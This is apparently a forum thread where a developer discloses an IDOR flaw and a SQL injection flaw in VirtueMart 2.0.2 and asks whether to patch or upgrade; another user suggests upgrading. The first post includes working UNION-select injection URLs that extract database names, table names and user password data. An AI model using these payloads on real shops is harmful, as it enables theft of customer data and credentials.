What should i do ?

[teobgeno]

Hello all,
I am working on a site with joomla 1.5.25 and Vm 2.0.2. Yesterday i noticed in http://docs.joomla.org/Vulnerable_Extensions_List#virtuemart_2.0.2
the vulnerability about vm 2.0.2. I also noticed that VM 2.0.2 has now been listed as "Vulnerable" in the Joomla Extensions Directory (JED).

A week before i read a post on this forum that seems to be deleted by now http://forum.virtuemart.net/index.php?topic=99686.0 explaining a security issue that a frontend user (no need to be registered) can view personal data of the other users . So i make a try  to see if that is true.Unfortunatelly it is true . This bug exists at the section where a user add a new address.If you add virtuemart_userinfo_id at the url
and this user id exists the form below will fill with this user id data.Below i provide the url


index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%20&addrtype=ST&cid%208%20=64&Itemid=30&virtuemart_userinfo_id=[USER_ID]

At components/com_virtuemart/views/user.view.html.php at line 126

if ($new) {
       $virtuemart_userinfo_id = 0;
   } else {
       $virtuemart_userinfo_id = JRequest::getString('virtuemart_userinfo_id', '0', '');
   }

The $virtuemart_userinfo_id is set here means that it takes the value from $_GET[] virtuemart_userinfo_id provided by the url above.Some lines below you can see that this $virtuemart_userinfo_id send to 

$userFields = $this->_model->getUserInfoInUserFields($layoutName, $address_type, $virtuemart_userinfo_id);  at line 149


So as i said before i saw this warning about the sql injection vulnerability for Vm 2.0.2 .

http://secunia.com/advisories/48713

In secunia.com there is a reference about the original post at  http://forum.virtuemart.net/index.php?topic=99999.0 . My first question is where is that post ? Why (if that was happened) was deleted ?

Finally i found this post
http://forum.virtuemart.net/index.php?topic=100819.0
that all this matter about the exploits are false alert.


  The http://secunia.com/advisories/48713  describes the vulnerability :
 
  Input passed via the "virtuemart_userinfo_id" POST parameter to index.php/virtue-mart-edit-address (when "option" is set to "com_virtuemart") is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
 
 
  And then i remember the issue about the hack conserning virtuemart_userinfo_id and the user data(the one i describe already).But that is not an sql injection vulnerability i thought. So i check again to be sure.
 
  Again at  components/com_virtuemart/views/user.view.html.php at line 126
 
  if ($new) {
       $virtuemart_userinfo_id = 0;
   } else {
       $virtuemart_userinfo_id = JRequest::getString('virtuemart_userinfo_id', '0', '');
   }
   
   And then i realize getString when virtuemart_userinfo_id should be int.So virtuemart_userinfo_id can be also a string ?
   Surely not properly sanitised.
   
   I make some test and unfortunatelly sql injection bug exists . I provide some sql inject urls below i made on my joomla 1.5.25 vm 2.0.2 windows xp xampp
   
   http://localhost/photo/index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%27&addrtype=ST&cid[8]=64&Itemid=30&virtuemart_userinfo_id=dd"+union+all+select+1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--"

http://localhost/photo/index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%27&addrtype=ST&cid[8]=64&Itemid=30&virtuemart_userinfo_id=dd"+union+all+select+1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--"


http://localhost/photo/index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%27&addrtype=ST&cid[8]=64&Itemid=30&virtuemart_userinfo_id=dd"+union+all+select+1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+WHERE+table_schema='123456'--"


http://localhost/photo/index.php?option=com_virtuemart&view=user&task=editAddressSt&new=%27&addrtype=ST&cid[8]=64&Itemid=30&virtuemart_userinfo_id=dd"+union+all+select+1,2,3,4,5,6,7,8,group_concat(username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users+WHERE+id='64'--"


This exploit unfortunatelly work. All the url above echo (database user , database name , table names of my db , username-password of users) in the name field at the frontend form . Also to be absolutely sure i download today the 2.0.2(stable) from http://virtuemart.net/ in case there is a fix.

As i said this test made on my machine.This exploit could be prevented if the machine that host the site has security plugins preventing sql injections (e.x Apache mod_security).But in reality this bug exists!!

In conclusion i must say that virtuemart team has made a great application and i will not blame them for that bugs especially when this piece of code is opensource.I am a programmer and i know that when you make an application there is no doubt that a bug will exist.For me that is no problem the bug will appear and you will fix it that is ok.But...

Since this application has to do with money transfers and many people rely their companies and their profit on that application you cannot in any case say "It is mainly a false alert. All the hacks do not work" . NO write the EXPLOIT EXISTS DOWNLOAD THE APPLICATION IN YOUR OWN RISK!!!! or DOWNLOAD THIS FIX FOR 2.0.2

So  i have a site with joomla 1.5.25 and Vm 2.0.2 and it must be live in 1 week . It is completed by 90%.

My question is what to do ? Download 2.0.3 ? Try to fix bugs on 2.0.2 ? Wait for a fix on 2.0.2?

Please give me suggestion.

Thank you and excuse my english.

[John2400]

Hi teobgeno,

I will just suggest that joomla 1.5 posts and updates have moved on - versions 2.5.2 had serious security issues and they are at 2.5.4

also today you will see that VM has had multiple releases - even as I post VM 2.0.4 stable  has just been released.

[teobgeno]

Thank you for your reply
I will update to VM 2.0.4 and i will patch the 1.5.25 joomla -> 1.5.26